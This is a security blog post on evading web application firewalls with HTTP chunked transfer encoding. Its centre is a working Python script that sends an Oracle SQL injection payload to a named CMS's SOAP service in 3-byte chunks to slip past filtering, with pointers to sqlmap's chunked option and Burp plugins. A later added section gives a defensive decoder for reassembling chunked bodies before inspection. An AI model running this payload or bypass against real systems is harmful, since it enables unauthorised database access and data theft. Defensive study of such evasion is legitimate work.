Neurohazard
Evening clouds and misty moon, poring over the classics until the hair turns white; all things under heaven, thus have I heard.

[WAF Evasion] Using Chunked Transfer to Bypass WAF

wpadmin ~ March 15, 2019 / InfoSec

Bypassing a WAF with chunked transfer encoding


Basic information

import requests
from io import BytesIO

def read_in_chunks(file_object, chunk_size=3):
    # Yield the body a few bytes at a time. requests sends a generator body with
    # Transfer-Encoding: chunked, emitting one chunk per yielded piece, so the
    # payload reaches the server split into 3-byte chunks.
    while True:
        data = file_object.read(chunk_size)
        if not data:
            break
        yield data


data = r'''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.cms.zving.com">
   <soapenv:Header/>
   <soapenv:Body>
      <web:addCatalog>
         <web:in0>2</web:in0>
         <web:in1>{sql}</web:in1>
         <web:in2>1</web:in2>
         <web:in3>1</web:in3>
      </web:addCatalog>
   </soapenv:Body>
</soapenv:Envelope>'''

sql = r"' or dbms_aw_xml.readawmetadata((select rawtohex(banner) from v$version where rownum=1), null) is null--"

# BytesIO takes bytes, so encode the formatted SOAP body (the template contains
# no braces other than the {sql} placeholder, so str.format is safe here)
data = BytesIO(data.format(sql=sql).encode('utf-8'))

url = 'http://www.example.com/cmsservice/Services/wsdl/CmsService'

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102', 'Content-Type': 'text/xml'}

req = requests.post(url, headers=headers, timeout=3, verify=False, data=read_in_chunks(data))

print(req.content)

a. On the limitations of this bypass: chunked transfer encoding can only be used with the POST method, so an injection point reached via GET cannot be bypassed this way.
b. In addition, newer versions of sqlmap have integrated chunked transfer, which can be enabled with --chunked.

https://github.com/sqlmapproject/sqlmap/pull/3536
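The reason the technique above works is that a WAF which pattern-matches the raw request bytes never sees the payload as one string: the chunk-size lines and CRLFs sit between the fragments. The fix on the inspection side is to reassemble the body exactly as the origin server will before running any rules. The following decoder is an added example written for this post, not code from the original article or from sqlmap; the sample chunked body, the `SQLI_PATTERN` signature and the function names are constructed for illustration.

```python
import re

# Constructed sample: the body "id=1' or 1=1--" sent in 3-byte chunks, the way a
# client with a generator body (like the requests snippet above) would emit it.
SAMPLE_CHUNKED = (
    b"3\r\nid=\r\n"
    b"3\r\n1' \r\n"
    b"3\r\nor \r\n"
    b"3\r\n1=1\r\n"
    b"2\r\n--\r\n"
    b"0\r\n\r\n"
)


class ChunkedDecodeError(ValueError):
    """Raised when a chunked body does not follow RFC 7230 section 4.1."""


def dechunk(raw: bytes, max_body: int = 1 << 20) -> bytes:
    """Reassemble an HTTP/1.1 chunked body into the bytes the origin will see.

    Chunk extensions ("size;name=value") are ignored, trailer fields after the
    zero-length chunk are skipped, and malformed sizes, truncated chunks or a
    body over max_body raise, so an inspecting proxy can fail closed.
    """
    out = bytearray()
    pos = 0
    while True:
        end = raw.find(b"\r\n", pos)
        if end == -1:
            raise ChunkedDecodeError("missing chunk-size line")
        size_field = raw[pos:end].split(b";", 1)[0].strip()
        if not re.fullmatch(rb"[0-9A-Fa-f]+", size_field):
            raise ChunkedDecodeError("bad chunk size: %r" % size_field)
        size = int(size_field, 16)
        pos = end + 2
        if size == 0:
            # last-chunk: optional trailer lines, then an empty line ends the body
            while True:
                end = raw.find(b"\r\n", pos)
                if end == -1:
                    raise ChunkedDecodeError("unterminated trailer section")
                if end == pos:
                    return bytes(out)
                pos = end + 2
        if len(out) + size > max_body:
            raise ChunkedDecodeError("body exceeds limit")
        chunk = raw[pos:pos + size]
        if len(chunk) != size or raw[pos + size:pos + size + 2] != b"\r\n":
            raise ChunkedDecodeError("truncated chunk")
        out += chunk
        pos += size + 2


def is_malformed(raw: bytes, max_body: int = 1 << 20) -> bool:
    """True when the body cannot be decoded; a WAF should reject it, not forward it."""
    try:
        dechunk(raw, max_body)
        return False
    except ChunkedDecodeError:
        return True


# Deliberately simple signature used only to show the split-across-chunks effect.
SQLI_PATTERN = re.compile(rb"'\s*or\s+", re.IGNORECASE)


def inspect(raw: bytes) -> dict:
    """Naive raw-byte matching versus matching on the reassembled body."""
    return {
        "raw_match": bool(SQLI_PATTERN.search(raw)),
        "decoded_match": bool(SQLI_PATTERN.search(dechunk(raw))),
    }


if __name__ == "__main__":
    print(inspect(SAMPLE_CHUNKED))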

参考资料

利用分块传输吊打所有 WAF
https://www.anquanke.com/post/id/169738

分块传输绕过 WAF 的 Burp 插件
【第8周】编写Burp分块传输插件绕WAF
link

chunk-encoded burp 插件
项目编译可以参考 http://wp.blkstone.me/2019/03/maven-basics/
https://github.com/c0ny1/chunked-coding-converter

Leave a Reply

Your email address will not be published. Required fields are marked *